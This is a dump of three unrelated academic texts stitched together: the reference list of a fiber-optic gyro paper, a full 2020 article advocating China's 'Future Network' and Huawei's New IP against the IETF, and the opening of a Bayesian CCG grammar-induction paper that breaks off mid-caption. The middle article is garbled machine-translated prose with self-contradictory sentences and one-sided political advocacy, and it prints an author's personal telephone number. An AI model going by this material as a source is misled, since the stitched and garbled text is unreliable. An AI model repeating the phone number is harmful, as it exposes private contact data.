compensation effect was analyzed by experiment data. The experiment results show that the influence of temperature on the zero bias of optical-fiber gyro was effectively reduced by using multinomial fitting method, which were compensated by three aspects of temperature, temperature gradient and temperature change rate. REFERENCES [1] HAN Bin, LIN Yu-rong, DENG Zheng-long. Overview on modeling and compensation of FOG temperature drift[J]. Journal Chinese Inertial Technology, 2009, 17(2):218-224. [2] Xu Hong-jie, Zhang Wen-yan, Xu Xiaobin,et al. Research on thermal induced Non-reciprocity in optical-fiber gyro with double optical length[J]. ACTA Photonica Sinica, 2014,43(10):1006001-1-5. [3] Yu Xuhui, Ma Huilian, Jin Zhonghe, et al. Improving thermal stability of a resonator optical-fiber gyro employing a polarizing resonator[J]. Optics Express, 2013, 21(1):358-369. [4] Lefèvre H C. The fiber-optic gyro: Achievement and perspective[J]. Gyroscopy and Navigation, 2012, 3(4):223-226. [5] DUSAN Agrez. Improving Phase estimation with leakage minimization[J]. IEEE Trans on IM, 2005, 54(4): 1347-1353. [6] LIU Yimg, XU Jin-tao, WANG Min-juan. Analyswas and compensation of the temperature field inside fiber optic coil[J]. Journal of Xi AN University of Posts and telecommunications, 2015，20(5)：28-33.76-78 [7] LIU Jie-yu, YU Zhi-yong, MA Xue-wen. Modeling and compensation of static temperature error synthetically for optical- fiber gyro[J]. Acta Optica Sinica, 2012, 32(8): 201-205. [8] ZHANG Yan-ping, PAN Zi-jun, WEI Zhi-wu, et al. Hardwwere implementation of temperature compensation for FOG ’ s scale- factor[J]. Journal of Chinese Inertial Technology,2013,21(5):660-662. work_j2jsr5bribfrhcbqjphuvzoxqa ---- International Journal of Advanced Network, Monitoring and Controls Volume 05, No.04, 2020 DOI: 10.21307/ijanmc-2020-040 75 Imperative to Build Network Security System and Speed Up the Future Network Construction Wu Aiqun 1,2,3 1 Vice Director of Shanghai Committee Economy of CPPCC 2 President of Shanghai Aerospace Information Technology Research Institute 3 Vice President of Urban Risk Management Research Institute of Tongji University Gao Zhangxing ISO/IEC Future Network Standardization Expert, Science and Technology Consultant of Nanjing Future Science Technology City Abstract—Network security is a comprehensive discipline involving computer science, network technology, communication technology, cryptography, information security technology, applied mathematics, number theory, information theory and other disciplines. Network security is to protect the hardware, software and data in the network system from accidental or malicious damage, change, and disclosure. The system runs continuously and reliably and normally, and network services are not interrupted. Although network security in the future market prospect is very good, but the Internet structural defects are known, because in the past nearly 20 years of rapid development of Internet technology, the pioneers of the IT industry seems to be technology focuses on the network flexibility and ignore the security of the network, so, in the site after the loss of a large number of network attacks, network security technology becomes emergent vacuum in the information technology, for the maintenance of computer network system security maintenance, inspection and repair network vulnerabilities, virus protection, organized by the national high strength against network has serious threat to all countries in the world, In such an environment, the core technology, key infrastructure is the only rely on independent innovation, create a new network system, with the new architecture, a new design, new technology, new resources, new standard and new application to open up a new network space, the building has an independent sovereign and independent control system of network security, it is imperative to accelerate the future network development. Keywords-New Architecture; New IP; New Technology; New Resources; New Standard; New Application I. INTRODUCTION The idea of "reorganizing the architecture of the web" is not a new idea. It has been around for 15 years. Since 2007, the international standardization organization ISO/IEC has been carrying out the Future Network standardization project of the new architecture Network system, and has set 2020 as the phased target for commercial use. This paper based on the research and development experience of ISO/IEC future network international standard, it shows that network system innovation is the core benefit of the development of China's information and communication technology, and it is imperative! International Journal of Advanced Network, Monitoring and Controls Volume 05, No.04, 2020 76 II. THE STRUCTURAL FLAWS OF THE INTERNET ARE WELL KNOWN AROUND THE WORLD China is no exception to the threat posed by state-level organized and high-intensity cyber confrontation to all countries in the world. In order to cope with state-level cyber confrontation, it is impossible not to change the situation that core technologies and key cyber infrastructure are in the hands of others. Core technologies cannot be bought and critical infrastructure cannot be sought. The only possibility is to rely on independent innovation, opening up a new network system, with the new architecture, a new design, new technology, new resources, new standard and new application space to open up a new network, the network construction of new frontier has sovereign and independent control of network security system, set up national network defense system, and for the enterprise and society to build a is not subject to sanctions and cyber threat to the survival and development space of peace. This is how countries and nations survive in the age of cyber warfare. Under the situation that the Internet monopolizes the global information technology facilities, the proposal of the "new architecture network system" is bound to encounter opposition and obstruction from the Internet vested interests. The statement on Huawei NewIP by IETF, an American corporate standards agency, is a reflection of this. As the ancient saying goes, "each man is his own boss", which is a natural stance for the IETF. However, everything must have a reason. You can't object for the sake of objecting, you have to have a valid reason. Judging by the IETF's claims, the argument is flimsy. The reason why Huawei proposed the "New IP" proposal emphasizes the structural defects of the Internet, and takes the 128-bit fixed-length address of the "next generation Internet" as an example to illustrate that in many application scenarios, shorter address length is needed, and the structure of the Internet does not meet the development needs of the society in the future. It has long been universally acknowledged that the Internet is structurally flawed. Even many documents in the United States government say a lot about it. For example, at the beginning of the Internet design, it did not anticipate the tremendous changes and security threats brought by the development of science and technology decades later. It did not embed security into the architecture design, and many network security problems were caused by the structural defects of the Internet. If you were to enumerate the structural flaws of the Internet, the list could go on and on. Taking 《 Future Network Architecture and Its Security》 research report written by Chinese academy of sciences in 2014 as an example, makes a comprehensive analysis of the defects of Internet architecture from the perspective of security, and summarizes dozens of security architecture design requirements and solutions. Taking the ISO/IEC international standard draft of 《 Future Network Security Architecture》 written by Chinese experts as an example, there are 100 technical indicators to be realized in the future network architecture design alone. These indicators correspond to the structural defects of the Internet one by one. If you include structural defects in other technical areas such as naming, addressing, routing, infrastructure, economics, topology, management, and so on, there are hundreds of structural problems that need to be addressed. However, the study of the "new architecture of the network" has long since passed the stage of Internet defect studies and feasibility studies. So there is no need to devote too much energy to responding to the IETF's objections. III. THE FUTURE OF THE INTERNET LEADS THE WORLD In the past two decades, there have been two ideological trends in the development of the network International Journal of Advanced Network, Monitoring and Controls Volume 05, No.04, 2020 77 technology system. One is the conservative approach stressed by Internet vested interests such as ISOC, ICANN, IETF and IANA that "the structural integrity of the Internet can only be maintained through gradual improvement". The biggest problem with this route is its inability to address structural flaws. Patch the method of "overlapping", security holes emerge in endlessly. Another trend of thought has emerged since the beginning of this century, advocating a new approach, using the "empty cup design" method, a new blueprint for network architecture on a piece of paper, through a new architecture design to fundamentally solve the security problem. From China's ministry of information industry to establish a decimal network standard working group (2001), to the national science foundation GENI - FIND plan (2005-2006), to the future network international version of the ISO/IEC standardization project (2007), the ITU -t 13 working group (2008-2009), the future of the network, to the eu's "brad manifesto" (2008), the President of the United States national security telecommunications commission proposed "shot in the network security project" (2018), the Brics calls chairman Xi Jinping, To speed up the construction of "the Brics future network institute" (2019), and then to Huawei, China mail tunnels institute, China Unicom and China mobile "New IP" proposal, that a series of facts show that over the past two decades, the idea of network architecture reconstruction in China, the us, European and international standards organization has been a research hotspot and frontier technology in the field, has become an irresistible trend of the world. In this world trend, the Internet standardization community will no longer hold a significant position. For Future Network (the Future Network, FN) as an example, the project is xi President called "the most authoritative international standardization organization" ISO/IEC organizations set up since 2007, currently has more than a dozen published planning technical report (ISO/IEC TR 29181 series), and are working on the Future Network architecture and protocol standard system (ISO/IEC 21558 and 21559 series standard). As early as 10 years ago (2010), a member of a national body had written to ISO/IEC, claiming that the Internet standards were maintained by the IETF, and that the future network project violated the rights of the IETF, demanding that the project be stopped and withdrawn. On the basis of the position paper submitted by Chinese experts to ISO/IEC, ISO/IEC adopted the resolution that the future network is a completely new network system, which is not related to the Internet and does not fall within the scope of the authority of IETF, so there is no reason to stop or withdraw it. Subsequently, the TR 29181 series of technical reports, led by Chinese experts, received unanimous approval in a vote. IV. THE NEW CYBER ARCHITECTURE WILL NOT HINDER GLOBAL CONNECTIVITY Although the trend of reconstructing network architecture is irresistible, it still encounters great resistance and interference in the development process in the past. Whether it is international or domestic, Internet interest monopoly groups spread some wrong views through the media, misleading the decision-making and the public. If analyzed carefully, these views are all prejudices and fallacies, which simply cannot hold water. For example, there is the "fragmentation" view that the new architecture of the network will lead to the fragmentation of the Internet and the "balkanization" of the Internet. But this view is groundless. Take the future network of ISO/IEC as an example. This is a brand new network system. It only considers the construction of its own system, but it will not touch the basic architecture and facilities of the Internet. The relationship between the future network and the Internet is like that between the new highway system and the old provincial and national highway system. International Journal of Advanced Network, Monitoring and Controls Volume 05, No.04, 2020 78 The construction of new highways will not hinder the survival and passage of old roads. There is also a view that the new network will hinder globalisation and that countries will not be able to connect with each other. This, too, is a fallacy. Take the ISO/IEC future network as an example. It is a project organized by an international standardization body and actively participated by many countries in the world. It fully conforms to WTO norms and is recognized by the world. Not only developing countries will support it, but many developed countries are also optimistic about the project. In 2010, for example, the UK national committee submitted comments urging Chinese experts to submit technical proposals for future web naming and addressing as soon as possible. A telecom expert from the national association of France led the proposal to help China promote the new future network technology program to African countries. So, as long as the new network has clever design and application space, other countries will not be able to use it. It is an unreasonable assumption without any basis that other countries will not use it. There is ample evidence of this both in the historical literature of the international standards of the future web and in the previous summit declarations of Brics leaders. There is a claim that, a new architecture of the network system will make the network investment benefit of telecom enterprises in the past suffered this view also belong to prejudice again in the future network, for example, France telecom has an expert in ISO/IEC has repeatedly stressed that the future network to consider good protect telecommunications enterprise's investment in 2009, Chinese experts to the ISO/IEC submitted a technical literature, in China a decimal network technology solutions, for example, suggests that the future network to ensure that the new network architecture independent complete and advanced nature, can also with the existing network connectivity, can protect the existing network investment Now that China Unicom and China mobile have joined Huawei's proposal, investment protection is no longer a concern. Some people accuse China's independent innovation in the Internet system of "shutting the door on the outside world" or "narrow gauge train". This is typical idle talk and scaremongering. Take the future of the Internet as an example. It is an international standard. How can it become a "closed door"? In the future, the network international standard will have guidance and priority for adoption all over the world. Why is it a narrow-gauge train? The whole world has agreed on the future network planning scheme, almost all countries have the need for a new network architecture, how can it be impossible to gradually deploy and apply it globally? Moreover, the future network has already been designed to be compatible with the existing network and can be quickly deployed. Coupled with the advanced technology and full consideration of the application prospect, the future network has unlimited development potential. V. NEW ARCHITECTURE FUTURE NETWORK RESEARCH AND DEVELOPMENT IN LINE WITH NATIONAL POLICY GUIDELINES In Huawei's "New IP" proposal, it is clearly stated that this proposal belongs to the "future network" category. This enables Huawei's proposal to be strongly supported by future domestic network technology accumulation and national policies. From the perspective of technology accumulation, China is the first country in the world to carry out the research on the new architecture network system. As early as the late 1990s, China has started the pre-research and tackling of the new network system, and has made technological breakthroughs and obtained patent and copyright protection. In 2001, the ministry of information industry of China set up the working group on decimal network standard, and soon promulgated the industry standard of "digital domain name specification" (2002). In 2004, when the International Journal of Advanced Network, Monitoring and Controls Volume 05, No.04, 2020 79 ISO/IEC JTC 1 / SC 6 Xi'an plenary session considered a future network standardization project with an entirely new architecture, China voted in favor. In the following ten years, China's national members have contributed a lot of technical documents to the future international network standards. The international standards committee, the ministry of industry and information technology and the China institute of electronic standardization have held several meetings to promote the future network standardization, and the central leadership has issued important instructions on many occasions. China is a major contributor to the naming and addressing and security solutions in the future network core technology areas. China voted in favor of the future of Internet international standards. Therefore, it is the national position of the People's Republic of China to establish a new architecture network system based on international standards. This position admits of no challenge. In terms of domestic policy, the Chinese government has always attached great importance to the future research and development of network technology. As early as 2013, the state council announced in document no. 8 that the gradual improvement of the Internet based on TCP/IP could no longer meet the needs, and that it was necessary to break through the basic theory of the future network, build future network experimental facilities, and incorporate the future network into the national medium - and long-term science and technology planning. In 2015, after a year-long investigation, the Chinese academy of sciences submitted a report to the state council, recommending the establishment of major national projects to promote future network research and development with the will of the state. In 2017, the general office of the CPC central committee, the general office of the state council, the cyberspace administration of the CPC central committee, the state standards commission, the ministry of science and technology, and the commission of science and technology of the central military commission all released documents, listing the future network as one of the key technology areas that are "forward-looking, subversive and killer" during the 13th five-year plan period. In 2019, at the brics informal summit in Osaka, Japan, President Xi Jinping proposed to speed up practical projects such as the brics future network institute. In such a situation, our country's scientific research institution should keep highly consistent with the party central committee and the State Council, the propaganda department and the mainstream media should also be clear to defend persevere in the position of network sovereignty, avoid becoming the Internet interests abroad monopoly the mouthpiece of the group to maintain its backward system, not for our country in the future, a new architecture of sovereignty for the construction of network system. VI. IT IS URGENT TO REBUILD THE NEW SYSTEM AND ACCELERATE THE SOCIAL BUSINESS APPLICATION President Xi Jinping has always stressed that core technologies cannot be acquired. We need to adhere to independent innovation to change the situation that core technologies in the field of information are controlled by others. In his remarks during the 2019 cyber security publicity week, Xi Jinping called for equal emphasis on governance and innovation in cyber security. In his speech at Davos 2019, vice chairman Wang mentioned innovation seven times. "We can only find ways to better slice the cake as we make it bigger," and said. "we can't stop and argue endlessly about how to cut the cake. Shifting the blame to others will not solve the problem. We now can completely don't have to dwell on the right and wrong of the Internet, and should make full use of the new infrastructure network system reconstruction strategic opportunities brought by the international trends, build a new architecture of the network system of big cake, establish complete sovereignty of network new space for the future in our country, and then lift force of the country, the International Journal of Advanced Network, Monitoring and Controls Volume 05, No.04, 2020 80 construction of new cyberspace into an exempt from cyber threats, with endless resources, people's safety work and future generations of survival in the new world, new frontiers and new paradise. This will be a great cause in the present and future. The use of innovation to develop the network technology system is a sovereign state's right to survival and development, no country has the right to interfere. The urgent task of advancing this cause is to accelerate the development of international standards for the future network. Huawei's dispute with the IETF over "New IP" is further proof of the importance of international standards. We are developing a new architecture not just to protect ourselves, but to address the urgent need of people around the world for equal sovereignty and a secure network. International standards are not only a platform for technical exchanges among countries on the new network technology system, but also a bridge for China's future network system plan leading the research and development to the world. Although China has made proud achievements in this field, there is still much work to be done to form a complete system of future network technology standards. In particular, the future network security architecture based on the new design of the international standard scheme is the key factor of the future network success or failure is the future network crown jewel. In this field, China has achieved world-leading results, and more national resources are needed to integrate it into the future network international standard system. In the environment of increasingly fierce competition for international standards in network system, enterprises will lose precious opportunities if they are allowed to face the competition of "full government power" from other countries. At the same time, China should urgently promote the practical deployment of the new architecture of the future network technology system. The expected commercial time of future Internet international standard is 2020. Because our country starts in this domain early, already had the ability that invests commercialize now. This preparation includes not only standards and equipment, but also application scenario design. The Internet of things is the biggest application scenario of the future network. The Internet of things based on the new future network architecture has been issued by the ministry of commerce and the ministry of industry and information technology in 2002, 2010 and 2016 respectively. Due to the advantage of being a late starter, China's future Internet of things technology is more in line with the application of the Internet of things. From the perspective of social research, there is a very urgent and widespread need. In the increasingly severe international situation and the increasingly imminent threat of cyber warfare, accelerating the deployment of China's autonomous and controllable future network is no longer an option, but a necessary option. The spread of covid-19 in the us and Europe has led to growing calls from western anti-china forces for China and the us to decoupled, a trend that is bound to spread to the cyber sector. We need to consider the question: what if the network decouples? Are we ready? This problem is not only Huawei will face, but also the difficult problem that people all over the country can not avoid. VII. CONCLUSION The "structural flaws in the Internet" proposed by Huawei in its "New IP" international standard proposal is a universally recognized fact that cannot be changed even if the IETF denies it. The proposal was submitted to the international standards organization. The IETF has comments that can be submitted to international institutions through its national membership. Huawei's idea and proposition of "rebuilding the network architecture" fully conform to the position of ISO/IEC international network standards in the future, which has been repeatedly demonstrated for 13 years, and its rationality and feasibility have been unanimously approved by the international community. The IETF's International Journal of Advanced Network, Monitoring and Controls Volume 05, No.04, 2020 81 position reflects its desire to protect the interests of the Internet, but whether it meets the needs of people around the world needs to be evaluated and considered in international standards bodies. The ISO/IEC one country, one vote decision-making mechanism is the best mechanism to ensure the sovereign equality of all countries and the fairness of the world. The route of "rebuilding network security architecture" represented by ISO/IEC future network international standard has been the trend of the world, representing the most important field and direction of the future development of information and communication technology in the world, and has reached the stage of commercial construction. The future network is a frontier technology field which the Chinese government attaches great importance to. Its technical scheme has been recognized by the world and has a wide application prospect in the world. The future network will sui generis, don't have to rely on existing network infrastructure support, but for the rapid deployment and application, the design with the existing network compatibility mechanism, will not affect the structure stability of the Internet, not push the fragmentation of the Internet, will not endanger the telecom enterprises existing investments, will not lead to a "closed" or "narrow gauge train" phenomenon. In the future, the network also has new core resources with great industrial value, which can drive huge social and economic value and industrial development space. "Ten years to sharpen a sword". The future of our country network is twenty years, in the theoretical study, the top design, the international standard, the system scheme, the security architecture, autonomous control, the core equipment, sovereign legislation, offensive and defensive drills, and strategic planning, etc, have mature solution, prepared and available equipment system, can be said to be the everything is ok, only owe the east wind. The investment of Huawei and other organizations indicates that the future network is on the fast track of development. At present, the international situation is very serious, and the threat of national-level cyber confrontation and cyber warfare is increasingly imminent. It is an urgent task to strengthen the construction of the national network security defense system with the new architecture of the future network technology system. In the past, there have long been differences in the development path of the network system, but there has been a growing consensus to rely on the new architecture of the network to strengthen national cyber security. We should seize the opportunity, give priority to national and national interests, discard past grievances, unite all forces that can be united, form the broadest possible united front, and accelerate the construction of a new architecture for future network standardization and social and practical deployment. ABOUT THE AUTHOR Wu Aiqun: Deputy director of the committee of economy of the CPPCC committee of Shanghai, President of Shanghai academy of aerospace information technology, vice President, professor, doctoral supervisor of urban risk management institute of tongji university, etc. Telephone number: 13801987952. Gao Zhangxing: ISO/IEC future network standardization expert, science and technology consultant of nanjing future science and technology city. Editor in charge: Yang Yining REFERENCES [1] Jung H., & Koh S.J. Mobile Optimized Future Internet”, http://protocol.knu.ac.kr/tech/CPL-TR- 10-01-MOFI-12.pdf, Jun. 2010Electronic Industry Standard of the People's Republic of China [M]. 2002. [2] Xie Jianping, HUANG Changfu. Current Situation and Development of Decimal Network [J]. Information Technology and Standardization,2004(04):5-9. [3] Zhang Yunghui, Jiang Xinhua, Lin Zhangxi. Comparison between IPv6 and IPv9 [J]. Computer Engineering,2006(04):116-118. [4] Soliman H., Castelluccia C., Malki K. E., Bellier L. Hierarchical Mobile IPv6 (HMIPv6) Mobility Management,” IETF RFC 5380, Oct. 2008 work_j4jyyr4gnrbelgfykpcumrgui4 ---- Transactions of the Association for Computational Linguistics, 1 (2013) 75–88. Action Editor: Sharon Goldwater. Submitted 11/2012; Revised 1/2013; Published 3/2013. c©2013 Association for Computational Linguistics. An HDP Model for Inducing Combinatory Categorial Grammars Yonatan Bisk and Julia Hockenmaier Department of Computer Science The University of Illinois at Urbana-Champaign 201 N Goodwin Ave Urbana, IL 61801 {bisk1,juliahmr}@illinois.edu Abstract We introduce a novel nonparametric Bayesian model for the induction of Combinatory Cat- egorial Grammars from POS-tagged text. It achieves state of the art performance on a number of languages, and induces linguisti- cally plausible lexicons. 1 Introduction What grammatical representation is appropriate for unsupervised grammar induction? Initial attempts with context-free grammars (CFGs) were not very successful (Carroll and Charniak, 1992; Charniak, 1993). One reason may be that CFGs require the specification of a finite inventory of nonterminal cat- egories and rewrite rules, but unless one adopts lin- guistic principles such as X-bar theory (Jackendoff, 1977), these nonterminals are essentially arbitrary labels that can be combined in arbitrary ways. While further CFG-based approaches have been proposed (Clark, 2001; Kurihara and Sato, 2004), most re- cent work has followed Klein and Manning (2004) in developing models for the induction of projec- tive dependency grammars. It has been shown that more sophisticated probability models (Headden III et al., 2009; Gillenwater et al., 2011; Cohen and Smith, 2010) and learning regimes (Spitkovsky et al., 2010), as well as the incorporation of prior lin- guistic knowledge (Cohen and Smith, 2009; Berg- Kirkpatrick and Klein, 2010; Naseem et al., 2010) can lead to significant improvement over Klein and Manning’s baseline model. The use of dependency grammars circumvents the question of how to obtain an appropriate inventory of categories, since depen- dency parses are simply defined by unlabeled edges between the lexical items in the sentence. But de- pendency grammars make it also difficult to cap- ture non-local structures, and Blunsom and Cohn (2010) show that it may be advantageous to refor- mulate the underlying dependency grammar in terms of a tree-substitution grammar (TSG) which pairs words with treelets that specify the number of left and right dependents they have. In this paper, we explore yet another option: instead of dependency grammars, we use Combinatory Categorial Gram- mar (CCG, Steedman (1996; 2000)), a linguistically expressive formalism that pairs lexical items with rich categories that capture all language-specific in- formation. This may seem a puzzling choice, since CCG requires a significantly larger inventory of cat- egories than is commonly assumed for CFGs. How- ever, unlike CFG nonterminals, CCG categories are not arbitrary symbols: they encode, and are deter- mined by, the basic word order of the language and the number of arguments each word takes. CCG is very similar to TSG in that it also pairs lexical items with rich items that capture all language-specific in- formation. Like TSG and projective dependency grammars, we restrict ourselves to a weakly context- free fragment of CCG. But while TSG does not dis- tinguish between argument and modifier dependen- cies, CCG makes an explicit distinction between the two. And while the elementary trees of Blunsom and Cohn (2010)’s TSG and their internal nodel la- bels have no obvious linguistic interpretation, the syntactic behavior of any CCG constituent can be directly inferred from its category. To see whether 75 the algorithm has identified the basic syntactic prop- erties of the language, it is hence sufficient to in- spect the induced lexicon. Conversely, Boonkwan and Steedman (2011) show that knowledge of these basic syntactic properties makes it very easy to cre- ate a language-specific lexicon for accurate unsu- pervised CCG parsing. We have recently proposed an algorithm for inducing CCGs (Bisk and Hocken- maier, 2012b) that has been shown to be competitive with other approaches even when paired with a very simple probability model (Gelling et al., 2012). In this paper, we pair this induction algorithm with a novel nonparametric Bayesian model that is based on a different factorization of CCG derivations, and show that it outperforms our original model and many other approaches on a large number of lan- guages. Our results indicate that the use of CCG yields grammars that are significantly more robust when dealing with longer sentences than most de- pendency grammar-based approaches. 2 Combinatory Categorial Grammar Combinatory Categorial Grammar (Steedman, 2000) is a linguistically expressive, lexicalized grammar formalism that associates rich syntactic types with words and constituents. For simplicity, we restrict ourselves to the standard two atomic types S (sentences) and N (encompassing both nouns and noun phrases) from which we recursively build categories. Complex categories are of the form X/Y or X\Y, and represent functions which return a result of type X when combined with an argument of type Y. The directionality of the slash indicates whether the argument precedes or follows the functor. We write X|Y when the direction of the slash does not matter. The CCG lexicon encodes all language-specific information. It pairs every word with a set of cate- gories that define both its specific syntactic behavior as well as the overall word order of the language: N: {he, girl, lunch, ...} N/N: {good, the, eating, ...} S\N: {sleeps, ate, eating, ...} (S\N)/N: {sees, ate, ...} S\S: {quickly, today...} (S\N)/(S\N): {good, the, ...} To draw a simple contrast, in Spanish we would expect adjectives to take the category N\N because Spanish word ordering dictates that the adjective fol- low the noun. The lexical categories also capture word-word dependencies: head-argument relations are captured by the lexical category of the head (e.g. (S\N)/N), whereas head-modifier relations are cap- tured by the lexical category of the modifier, which is of the form X\X or X/X, and may take further arguments of its own. Our goal will be to automati- cally learn these types of lexicons for a language. In Figure 3, we juxtapose several such lexicons which were automatically discovered by our system. The rules of CCG are defined by a small set of of combinatory rules, which are traditionally writ- ten as schemas that define how constituents can be combined in a bottom-up fashion (although genera- tive probability models for CCG view them in a top- down manner, akin to CFG rules). The first, and most obvious, of these rules is function application: X/Y Y ⇒ X (B0>) Y X\Y ⇒ X (B0<) Here the functor X/Y or X\Y is applied to an argument Y resulting in X. While standard CCG has a number of additional combinatory rules (type- raising, generalized variants of composition and substitution) that increase its generative capacity be- yond context-free grammars and allow an elegant treatment of non-local dependencies arising in ex- traction, coordination and scrambling, we follow Bisk and Hockenmaier (2012b) and use a restricted fragment, without type-raising, that allows only ba- sic composition and is context-free: X/Y Y/Z ⇒ X/Z (B1> ) X/Y Y\Z ⇒ X\Z (B1X>) Y\Z X\Y ⇒ X\Z (B1< ) Y/Z X\Y ⇒ X/Z (B1X<) The superscript 1 denotes the arity of the compo- sition which is too low to recover non-projective de- pendencies, and our grammar is thus weakly equiva- lent to the dependency grammar representations that are commonly used for grammar induction. The main role of composition in our fragment is that it allows sentential and verb modifiers to both take cat- egories of the form S\S and S/S. Composition in- 76 troduces spurious ambiguities, which we eliminate by using Eisner (1996)’s normal form.1 Coordinating conjunctions have a special cate- gory conj, and we binarize coordination as follows (Hockenmaier and Steedman, 2007): X X[conj] ⇒&1 X (&1) conj X ⇒&2 X[conj] (&2) 3 Category induction Unlike dependency grammars, CCG requires an in- ventory of lexical categories. Given a set of lexical categories, the combinatory rules define the set of parses for each sentence. We follow the algorithm proposed by Bisk and Hockenmaier (2012b) to au- tomatically induce these categories. The lexicon is initialized by pairing all nominal tags (nouns, pro- nouns and determiners) with the category N, all verb tags with the category S, and coordinating conjunc- tions with the category conj: CONJ → conj DET, NOUN, NUM, PRON → N VERB → S Although our lexicons are defined over corpus- specific POS tags, we use a slightly modified version of Petrov et al. (2012)’s Universal POS tagset to cat- egorize them into these broad classes. The primary changes we make to their mappings are the addition of a distinction (where possible) between subordi- nating and coordinating conjunctions and between main and auxiliary verbs2. Since the initial lexicon consists only of atomic categories, it cannot parse any complex sentences: The man ate quickly DT NNS VBD RB - N S - Complex lexical categories are induced by con- sidering the local context in which tokens appear. Given an input sentence, and a current lexicon which assigns categories to at least some of the tokens in the sentence, we apply the following two rules to add new categories to the lexicon: The argument rule allows any lexical tokens that have categories other than N and conj to take immediately adjacent 1The normal-form of Hockenmaier and Bisk (2010) is not required for this fragment of CCG. 2This distinction was suggested by the authors (p.c.) Ns as arguments. The modifier rule allows any to- ken (other than coordinating conjunctions that ap- pear in the middle of sentences) to modify an imme- diate neighbor that has the category S or N or is a modifier (S|S or N|N) itself. The man ate quickly DT NNS VBD RB N/N N, S/S S, N\N S\S S\N These rules can be applied iteratively to form more complex categories. We restrict lexical cate- gories to a maximal arity of 2, and disallow the cat- egory (S/N)\N, since it is equivalent to (S\N)/N. The man ate quickly DT NNS VBD RB N/N, N, S/S S, N\N, S\S, (S/S)/(S/S)(N\N)/(N\N) S\N (N\N)\(N\N) (N/N)\(N/N) (S/S)\(S/S) (S\S)/(S\S) The resultant, overly general, lexicon is then used to parse the training data. Each complete parse has to be of category S or N, with the constraint that sentences that contain a main verb can only form parses of category S. 4 A new probability model for CCG Generative models define the probability of a parse tree τ as the product of individual rule probabili- ties. Our previous work (Bisk and Hockenmaier, 2012b) uses the most basic model of Hockenmaier and Steedman (2002), which first generates the head direction (left, right, unary, or lexical), followed by the head category, and finally the sister category. 3 This factorization does not take advantage of the unique functional nature of CCG. We therefore in- troduce a new factorization we call the Argument Model. It exploits the fact that CCG imposes strong constraints on a category’s left and right children, since these must combine to create the parent type via one of the combinators. In practice this means that given the parent X/Z, the choice of combinator4 c and an argument Y we can uniquely determine the categories of the left and right children: 3Huang et al. (2012) present a (deficient) variant and Bayesian extension of the Bisk and Hockenmaier (2012b) model without k-best smoothing that both underperform our published results. 4If X is an atomic category, only application is possible. 77 Parent c ⇒ Left Right X/Z B0> (X/Z)/Y Y B0< Y (X/Z)\Y B1> X/Y Y/Z B1< Y/Z X\Y and correspondingly for X\Z: Parent c ⇒ Left Right X\Z B0> (X\Z)/Y Y B0< Y (X\Z)\Y B1> X/Y Y\Z B1< Y\Z X\Y While type-changing and raising are not used in this work the model’s treatment of root productions extends easily to handle these other unary cases. We simply treat the argument Y as the unary outcome so that the parent, combinator and argument uniquely specify every detail of the unary rule: Parent c ⇒ Y TOP TOP ∈{S,N} S/(S\N) T< N S\(S/N) T> N We still distinguish the same rule types as before (lexical, unary, binary with head left/right), leading us to the following model definition: Given: P := X/Z where type(t) ∈{Left,Right,Unary,Lex} p(t|P) × { p(w|P, t) Lex p(Y|P, t) ×p(c|P, t,Y) o.w. Argument Combinator Note that this model generates only one CCG cat- egory but uniquely defines the two children of a par- ent node. We will see below that this greatly simpli- fies the development of non-parametric extensions. 5 HDP-CCG: a nonparametric model Simple generative models such as PCFGs or Bisk and Hockenmaier (2012b)’s CCG model are not robust in the face of sparsity, since they assign zero probability to any unseen event. Sparsity is a particular problem for formalisms like CCG that have a rich inventory of object types. Nonpara- metric Bayesian models, e.g. Dirichlet Processes (Teh, 2010) or their hierarchical variants (Teh et al., 2006) and generalizations (Teh, 2006) overcome this problem in a very elegant manner, and are used by many state-of-the-art grammar induction systems (Naseem et al., 2010; Blunsom and Cohn, 2010; Boonkwan and Steedman, 2011). They also im- pose a rich-getting-richer behavior that seems to be advantageous in many modeling applications. By contrast, Bisk and Hockenmaier (2012b) propose a weighted top-k scheme to address these issues in an ad-hoc manner. The argument model introduced above lends it- self particularly well to nonparametric extensions such as the standard Hierarchical Dirichlet Pro- cesses (HDP). In this work the size of the grammar and the number of productions are fixed and small, but we present the formulation as infinite to allow for easy extension in the future. Specifically, this frame- work allows for extensions which grow the grammar during parsing/training or fully lexicalize the pro- ductions. Additionally, while our current work uses only a restricted fragment of CCG that has only a finite set of categories, the literature’s generalized variants of composition make it possible to gener- ate categories of unbounded arity. We therefore be- lieve that this is a very natural probabilistic frame- work for CCG, since HDPs make it possible to con- sider a potentially infinite set of categories that can instantiate the Y slot, while allowing the model to capture language-specific preferences for the set of categories that can appear in this position. The HDP-CCG model In Bayesian models, multinomials are drawn from a corresponding n- dimensional Dirichlet distribution. The Dirichlet Process (DP) generalizes the Dirichlet distribution to an infinite number of possible outcomes, allowing us to deal with a potentially infinite set of categories or words. DPs are defined in terms of a base dis- tribution H that corresponds to the mean of the DP, and a concentration or shape parameter α. In a Hi- erarchical Dirichlet Process (Teh et al., 2006), there is a hierarchy of DPs, such that the base distribution of a DP at level n is a DP at level n− 1. The HDP-CCG (Figure 1) is a reformulation of the Argument Model introduced above in terms of Hierarchical Dirichlet Processes.5 At the heart of the model is a distribution over CCG categories. By combining a stick breaking process with a multino- mial over categories we can define a DP over CCG 5An alternative HDP model for semantic parsing with CCG is proposed by Kwiatkowski et al. (2012). 78 HDP-CCG 1) Draw global parameters Define MLE root parameter θTOP Draw top-level symbol weights βY ∼ GEM(αY ) Draw top-level lexical weights βL ∼ GEM(αL) For each grammar symbol z ∈{1, 2, ...}: Define MLE rule type parameters θTz Draw argument parameters φYz ∼ DP(αY,βY ) Draw lexical emission parameters φLz ∼ DP(αL,βL) For each grammar symbol y ∈{1, 2, ...}: Define MLE combinator parameters θCz,y 2) For each parse tree: Generate root node zTOP ∼ Binomial(θTOP ) For each node i in the parse tree: Choose rule type ti ∼ Multinomial(θTzi ) If ti == Lex: Emit terminal symbol xi ∼ Multinomial(φLzi ) If ti == Left/Right/Unary: Generate argument category yi ∼ Multinomial(φYzi ) Generate combinator ci ∼ Multinomial(θCzi,yi ) Deterministically create zL(i) (and zR(i) if binary) zi yi ci zL(i) zR(i) xL(i) xR(i) z ∞ ∞y φY θT θC φL βY βL Because we are working with CCG, the parent zi, argument yi and combinator ci uniquely define the two children categories (zL(i),zR(i)). The dashed arrows here rep- resent the deterministic process used to generate these two categories. Figure 1: The HDP-CCG has two base distributions, one over the space of categories and the other over words (or tags). For every grammar symbol, an argument distribution and emission distribution is drawn from the corresponding 